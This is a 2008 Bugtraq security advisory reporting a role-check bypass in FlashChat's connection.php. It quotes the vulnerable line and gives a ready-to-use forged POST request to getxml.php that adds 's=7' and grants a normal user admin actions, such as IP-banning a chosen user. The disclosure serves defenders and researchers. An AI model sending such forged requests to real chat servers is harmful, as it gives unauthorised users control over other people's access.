[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: flashchat severe bug
From: ch0p83 () gmail ! com
Date: 2008-10-17 14:44:38
Message-ID: 20081017144438.7383.qmail () securityfocus ! com
[Download RAW message or body]
File: connection.php
if(
ChatServer::userInRole($this->userid, ROLE_ADMIN) ||
ChatServer::userInRole($this->userid, ROLE_MODERATOR) ||
($req['s'] == 7) <-- *bypass line*
)
This piece of code allows a normal user to bypass role filtering and to be granted \
admin role as a normal user. To exploit the vulnerability simply send to getxml.php, \
while into the chat, this post data string (for example intercepting and modifying a \
legal message packet sent to the server with tamper data plugin of firefox):
for example to ban a user simply add the bypass to the normal ban string request:
replace:
//normal message sent to server thas has being intercepted
sendAndLoad=%5Btype%20Function%5D&t=hi everybody&r=0&id=
with:
//normal ban packet used by admins or mods
sendAndLoad=%5Btype%20Function%5D&t=&r=0&u=5581&b=3&c=banu&cid=1&id=
//forged packet send by attacker
sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=
*note the s=7 added
this will ip-ban user with id 5581 from chat.
eLiSiA - 17-10-2008
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic